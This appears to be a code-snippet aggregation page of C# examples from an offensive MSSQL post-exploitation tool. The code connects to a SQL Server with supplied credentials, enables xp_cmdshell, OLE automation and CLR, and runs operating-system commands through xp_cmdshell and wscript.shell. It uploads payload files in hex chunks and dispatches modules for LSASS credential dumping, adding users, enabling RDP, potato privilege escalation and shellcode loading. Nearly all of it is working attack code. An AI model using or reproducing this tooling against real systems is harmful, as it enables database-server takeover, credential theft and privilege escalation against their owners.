Пример #1
0
        static void Main(string[] args)
        {
            if (args.Length != 3)
            {
                Info.ShowUsage();
                return;
            }

            var Conn         = SqlConnet(args[0], args[1], args[2]);
            var setting      = new Setting(Conn);
            var filesOptions = new FilesOptions(Conn, setting);
            var execOptions  = new ExecOptions(Conn, setting);

            try
            {
                do
                {
                    Console.Write("SQL> ");
                    string str = Console.ReadLine();
                    if (str.ToLower() == "exit")
                    {
                        Conn.Close(); break;
                    }
                    else if (str.ToLower() == "help")
                    {
                        Info.ShowModuleUsage(); continue;
                    }

                    string[] cmdline = str.Split(new char[] { ' ' }, 3);
                    String   s       = String.Empty;
                    for (int i = 1; i < cmdline.Length; i++)
                    {
                        s += cmdline[i] + " ";
                    }

                    switch (cmdline[0].ToLower())
                    {
                    case "enable_xp_cmdshell":
                        setting.Enable_xp_cmdshell();
                        break;

                    case "disable_xp_cmdshell":
                        setting.Disable_xp_cmdshell();
                        break;

                    case "xp_cmdshell":
                        execOptions.xp_cmdshell(s);
                        break;

                    case "enable_ole":
                        setting.Enable_ola();
                        break;

                    case "disable_ole":
                        setting.Disable_ole();
                        break;

                    case "sp_cmdshell":
                        execOptions.sp_cmdshell(s);
                        break;

                    case "upload":
                        filesOptions.UploadFiles(cmdline[1], cmdline[2]);
                        break;

                    case "download":
                        filesOptions.DownloadFiles(cmdline[2], cmdline[1]);
                        break;

                    default:
                        Console.WriteLine(Batch.RemoteExec(Conn, str, true));
                        break;
                    }
                    if (!ConnectionState.Open.Equals(Conn.State))
                    {
                        Console.WriteLine("[!] Disconnect....");
                        break;
                    }
                }while (true);
            }
            catch (Exception ex)
            {
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #2
0
        static void Noninteractive(string[] args)
        {
            if (args.Length < 4)
            {
                Help();
                return;
            }
            string target   = args[0];
            string username = args[1];
            string password = args[2];
            string module   = args[3];

            try
            {
                //sql建立连接
                string connectionString = String.Format("Server = {0};Database = master;User ID = {1};Password = {2};", target, username, password);
                Conn              = new SqlConnection(connectionString);
                Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
                Conn.Open();
                Console.WriteLine("[*] Database connection is successful!");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
                Environment.Exit(0);
            }

            setting = new Setting(Conn);
            try
            {
                // string[] cmdline = str.Split(new char[] { ' ' }, 3);

                switch (module.ToLower())
                {
                case "enable_xp_cmdshell":
                    setting.Enable_xp_cmdshell();
                    break;

                case "disable_xp_cmdshell":
                    setting.Disable_xp_cmdshell();
                    break;

                case "xp_cmdshell":
                {
                    String command = String.Empty;
                    if (args.Length > 5)
                    {
                        for (int i = 4; i < args.Length; i++)
                        {
                            command += args[i] + " ";
                        }
                    }
                    else
                    {
                        command = args[4];
                    }
                    xp_shell(command);
                    break;
                }

                case "sp_oacreate":
                {
                    {
                        String command = String.Empty;
                        if (args.Length > 5)
                        {
                            for (int i = 4; i < args.Length; i++)
                            {
                                command += args[i] + " ";
                            }
                        }
                        else
                        {
                            command = args[4];
                        }
                        sp_shell(command);
                        break;
                    }
                }

                case "upload":
                    UploadFiles(args[4], args[5]);
                    break;

                case "download":
                    DownloadFiles(args[5], args[4]);
                    break;

                case "enable_ole":
                    setting.Enable_ola();
                    break;

                case "disable_ole":
                    setting.Disable_ole();
                    break;

                case "clr_dumplsass":
                    clr_exec("clr_dumplsass");
                    break;

                case "clr_rdp":
                    clr_exec("clr_rdp");
                    break;

                case "clr_getav":
                    clr_exec("clr_getav");
                    break;

                case "clr_adduser":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader2":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_download":
                {
                    String s = String.Empty;
                    for (int i = 3; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "enable_clr":
                    setting.Enable_clr();
                    break;

                case "disable_clr":
                    setting.Disable_clr();
                    break;

                case "install_clr":
                {
                    setting.Set_permission_set();
                    setting.CREATE_ASSEMBLY();
                    setting.CREATE_PROCEDURE();
                    Console.WriteLine("[+] Install crl successful!");
                    break;
                }

                case "uninstall_clr":
                    setting.drop_clr();
                    break;

                default:
                    Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
                    break;
                }
                if (!ConnectionState.Open.Equals(Conn.State))
                {
                    Console.WriteLine("[!] Disconnect....");
                }
                Conn.Close();
            }
            catch (Exception ex)
            {
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #3
0
 /// <summary>
 /// xp_cmdshell 执行命令
 /// </summary>
 /// <param name="Command">命令</param>
 static void xp_shell(String Command)
 {
     sqlstr = String.Format("exec master..xp_cmdshell '{0}'", Command);
     Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true));
 }
Пример #4
0
        static void interactive(string[] args)
        {
            string target   = args[0];
            string username = args[1];
            string password = args[2];

            try
            {
                //sql建立连接
                string connectionString = String.Format("Server = \"{0}\";Database = \"master\";User ID = \"{1}\";Password = \"{2}\";", target, username, password);
                Conn              = new SqlConnection(connectionString);
                Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
                Conn.Open();
                Console.WriteLine("[*] Database connection is successful!");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
                Environment.Exit(0);
            }

            setting = new Setting(Conn);

            try
            {
                do
                {
                    Console.Write("SQL> ");
                    string str = Console.ReadLine();
                    if (str.ToLower() == "exit")
                    {
                        Conn.Close(); break;
                    }
                    else if (str.ToLower() == "help")
                    {
                        Help(); continue;
                    }

                    string[] cmdline = str.Split(new char[] { ' ' }, 3);

                    switch (cmdline[0].ToLower())
                    {
                    case "enable_xp_cmdshell":
                        setting.Enable_xp_cmdshell();
                        break;

                    case "disable_xp_cmdshell":
                        setting.Disable_xp_cmdshell();
                        break;

                    case "xp_cmdshell":
                    {
                        String s = String.Empty;
                        for (int i = 1; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        xp_shell(s);
                        break;
                    }

                    case "sp_oacreate":
                    {
                        String s = String.Empty;
                        for (int i = 1; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        sp_shell(s);
                        break;
                    }

                    case "upload":
                        UploadFiles(cmdline[1], cmdline[2]);
                        break;

                    case "download":
                        DownloadFiles(cmdline[2], cmdline[1]);
                        break;

                    case "enable_ole":
                        setting.Enable_ola();
                        break;

                    case "disable_ole":
                        setting.Disable_ole();
                        break;

                    case "clr_dumplsass":
                        clr_exec("clr_dumplsass");
                        break;

                    case "clr_rdp":
                        clr_exec("clr_rdp");
                        break;

                    case "clr_getav":
                        clr_exec("clr_getav");
                        break;

                    case "clr_adduser":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "clr_scloader":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "clr_scloader2":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "clr_download":
                    {
                        String s = String.Empty;
                        for (int i = 0; i < cmdline.Length; i++)
                        {
                            s += cmdline[i] + " ";
                        }
                        clr_exec(s);
                        break;
                    }

                    case "enable_clr":
                        setting.Enable_clr();
                        break;

                    case "disable_clr":
                        setting.Disable_clr();
                        break;

                    case "install_clr":
                    {
                        setting.Set_permission_set();
                        setting.CREATE_ASSEMBLY();
                        setting.CREATE_PROCEDURE();
                        Console.WriteLine("[+] Install clr done.");
                        break;
                    }

                    case "uninstall_clr":
                        setting.drop_clr();
                        break;

                    default:
                        Console.WriteLine(Batch.RemoteExec(Conn, str, true));
                        break;
                    }
                    if (!ConnectionState.Open.Equals(Conn.State))
                    {
                        Console.WriteLine("[!] Disconnect....");
                        break;
                    }
                }while (true);
            }
            catch (Exception ex)
            {
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #5
0
        /// <summary>
        /// 文件上传,使用 OLE Automation Procedures 的 ADODB.Stream
        /// </summary>
        /// <param name="localFile">本地文件</param>
        /// <param name="RemoteFile">远程文件</param>
        static void UploadFiles(String localFile, String remoteFile)
        {
            Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));

            if (setting.Check_configuration("Ole Automation Procedures", 0))
            {
                if (setting.Enable_ola())
                {
                    return;
                }
            }

            int count = 0;

            try
            {
                string    hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2")));
                ArrayList arrlist   = GetSeparateSubString(hexString, 150000);

                foreach (string hex150000 in arrlist)
                {
                    count++;
                    string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count);

                    sqlstr = String.Format(@"
                        DECLARE @ObjectToken INT
                        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
                        EXEC sp_OASetProperty @ObjectToken, 'Type', 1
                        EXEC sp_OAMethod @ObjectToken, 'Open'
                        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
                        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
                        EXEC sp_OAMethod @ObjectToken, 'Close'
                        EXEC sp_OADestroy @ObjectToken", hex150000, filePath);
                    Batch.RemoteExec(Conn, sqlstr, false);
                    if (setting.File_Exists(filePath, 1))
                    {
                        Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count);
                    }
                    else
                    {
                        Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count);
                        Conn.Close();
                        Environment.Exit(0);
                    }

                    Thread.Sleep(5000);
                }

                string shell = String.Format(@"
                    DECLARE @SHELL INT 
                    EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT 
                    EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");

                sqlstr = "copy /b ";
                for (int i = 1; i < count + 1; i++)
                {
                    if (i != count)
                    {
                        sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i);
                    }
                    else
                    {
                        sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i);
                    }
                }

                Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
                Batch.RemoteExec(Conn, shell + sqlstr, false);
                Thread.Sleep(5000);

                sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
                Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
                Batch.RemoteExec(Conn, shell + sqlstr, false);

                if (setting.File_Exists(remoteFile, 1))
                {
                    Console.WriteLine("[*] '{0}' Upload completed", localFile);
                }
            }
            catch (Exception ex)
            {
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #6
0
 /// <summary>
 /// clr_exec 执行命令
 /// </summary>
 /// <param name="Command">命令</param>
 static void clr_exec(String Command)
 {
     sqlstr = String.Format("exec dbo.ClrExec '{0}'", Command);
     Batch.CLRExec(Conn, sqlstr);
 }
Пример #7
0
        static void Noninteractive(string[] args)
        {
            if (args.Length < 4)
            {
                Help();
                return;
            }
            string target = args[0];

            if (target.Contains(":"))
            {
                target = target.Replace(":", ",");
            }
            string username = args[1];
            string password = args[2];
            string database = args[3];
            string module   = args[4];

            try
            {
                //sql建立连接
                string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
                Conn              = new SqlConnection(connectionString);
                Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
                Conn.Open();
                Console.WriteLine("[*] Database connection is successful!");
            }
            catch (Exception ex)
            {
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
                Environment.Exit(0);
            }

            setting = new Setting(Conn);
            try
            {
                // string[] cmdline = str.Split(new char[] { ' ' }, 3);

                switch (module.ToLower())
                {
                case "enable_xp_cmdshell":
                    setting.Enable_xp_cmdshell();
                    break;

                case "disable_xp_cmdshell":
                    setting.Disable_xp_cmdshell();
                    break;

                case "xp_cmdshell":
                {
                    String command = String.Empty;
                    if (args.Length > 6)
                    {
                        for (int i = 5; i < args.Length; i++)
                        {
                            command += args[i] + " ";
                        }
                    }
                    else
                    {
                        command = args[5];
                    }
                    xp_shell(command);
                    break;
                }

                case "sp_oacreate":
                {
                    {
                        String command = String.Empty;
                        if (args.Length > 6)
                        {
                            for (int i = 5; i < args.Length; i++)
                            {
                                command += args[i] + " ";
                            }
                        }
                        else
                        {
                            command = args[5];
                        }
                        sp_shell(command);
                        break;
                    }
                }

                case "upload":
                    UploadFiles(args[5], args[6]);
                    break;

                case "download":
                    DownloadFiles(args[6], args[5]);
                    break;

                case "enable_ole":
                    setting.Enable_ola();
                    break;

                case "disable_ole":
                    setting.Disable_ole();
                    break;

                case "clr_dumplsass":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_ping":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_cat":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_ls":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_cd":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_rm":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_pwd":
                    clr_exec("clr_pwd");
                    break;

                case "clr_netstat":
                    clr_exec("clr_netstat");
                    break;

                case "clr_ps":
                    clr_exec("clr_ps");
                    break;

                case "clr_rdp":
                    clr_exec("clr_rdp");
                    break;

                case "clr_getav":
                    clr_exec("clr_getav");
                    break;

                case "clr_adduser":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_exec":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_efspotato":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_badpotato":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader1":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_scloader2":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_download":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "clr_combine":
                {
                    String s = String.Empty;
                    for (int i = 4; i < args.Length; i++)
                    {
                        s += args[i] + " ";
                    }
                    clr_exec(s);
                    break;
                }

                case "enable_clr":
                    setting.Enable_clr();
                    break;

                case "disable_clr":
                    setting.Disable_clr();
                    break;

                case "install_clr":
                {
                    setting.install_clr();
                    break;
                }

                case "uninstall_clr":
                    setting.drop_clr();
                    break;

                default:
                    Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
                    break;
                }
                if (!ConnectionState.Open.Equals(Conn.State))
                {
                    Console.WriteLine("[!] Disconnect....");
                }
                Conn.Close();
            }
            catch (Exception ex)
            {
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }
Пример #8
0
        /// <summary>
        /// 文件上传,使用 OLE Automation Procedures 的 ADODB.Stream
        /// </summary>
        /// <param name="localFile">本地文件</param>
        /// <param name="RemoteFile">远程文件</param>
        static void UploadFiles(String localFile, String remoteFile)
        {
            Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));

            if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola())
            {
                return;
            }
            byte[] byteArray = ReadFileToByte(localFile);
            string text      = "copy /b ";

            if (setting.File_Exists(remoteFile, 1))
            {
                Console.WriteLine("[+] {0} Exists", remoteFile);
                return;
            }
            int        num         = 0;
            int        num2        = 0;
            int        splitLength = 250000;
            List <int> list        = SplitFileSize(byteArray.Length, splitLength);

            try
            {
                foreach (int num3 in list)
                {
                    string text2 = string.Format("{0}_{1}.config_txt", remoteFile, num);
                    byte[] array = new byte[num3];
                    Array.Copy(byteArray, num2, array, 0, num3);
                    string hexstr = string.Concat(from b in array
                                                  select b.ToString("X2"));
                    sqlstr = String.Format(@"
                        DECLARE @ObjectToken INT
                        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
                        EXEC sp_OASetProperty @ObjectToken, 'Type', 1
                        EXEC sp_OAMethod @ObjectToken, 'Open'
                        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
                        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
                        EXEC sp_OAMethod @ObjectToken, 'Close'
                        EXEC sp_OADestroy @ObjectToken", hexstr, text2);
                    Batch.RemoteExec(Conn, sqlstr, false);
                    num2 += num3;
                    num++;
                    text = text + "\"" + text2 + "\"+";
                    Thread.Sleep(1000);
                    if (setting.File_Exists(text2, 1))
                    {
                        Console.WriteLine("[+] {0}_{1}.config_txt Upload completed", remoteFile, num);
                    }
                    else
                    {
                        Console.WriteLine("[!] {0}_{1}.config_txt Error uploading", remoteFile, num);
                        Conn.Close();
                        Environment.Exit(0);
                    }

                    Thread.Sleep(1000);
                }

                text = text.Trim(new char[]
                {
                    '+'
                }) + " \"" + remoteFile + "\"'";
                string shell = String.Format(@"
                    DECLARE @SHELL INT 
                    EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT 
                    EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");

                Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
                Batch.RemoteExec(Conn, shell + text, false);
                Thread.Sleep(1000);

                if (setting.File_Exists(remoteFile, 1))
                {
                    sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
                    Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
                    Batch.RemoteExec(Conn, shell + sqlstr, false);
                    Console.WriteLine("[*] '{0}' Upload completed", localFile);
                }
                //setting.Disable_ole();
            }
            catch (Exception ex)
            {
                Conn.Close();
                Console.WriteLine("[!] Error log: \r\n" + ex.Message);
            }
        }